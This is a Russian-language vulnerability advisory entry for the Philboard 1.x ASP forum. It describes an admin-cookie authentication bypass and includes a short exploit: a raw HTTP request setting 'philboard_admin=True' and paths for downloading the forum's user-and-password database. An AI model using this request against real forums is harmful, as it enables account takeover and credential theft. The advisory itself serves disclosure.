Дата публикации: | 02.06.2003 |
Дата изменения: | 02.07.2008 |
Всего просмотров: | 1296 |
Опасность: | Средняя |
Наличие исправления: | Нет |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | Удаленная |
Воздействие: | Обход ограничений безопасности |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | Philboard 1.x |
Описание: | Уязвимость обнаружена в бесплатном ASP форуме Philboard. Удаленный пользователь может получить административные привилегии на системе.
Сообщается, что удаленный пользователь может установить куки форума к "philboard_admin=True;" или "admin=True;", чтобы получить привилегии администратора на системе. Эксплоит: 1) Login Administrator Forum: Use your telnet and open target on port 80 GET /board/philboard_admin.asp HTTP/1.0 Host: target.com Cookie: philboard_admin=True; 2) Download the database (users and password): Usually, the database location can be found and download it from: http://www.target.com/database/philboard.mdb or http://www.target.com/forum/database/philboard.mdbУязвимость обнаружена в Philboard up to v1.14 |
Ссылки: | Philboard Forum Vulnerability |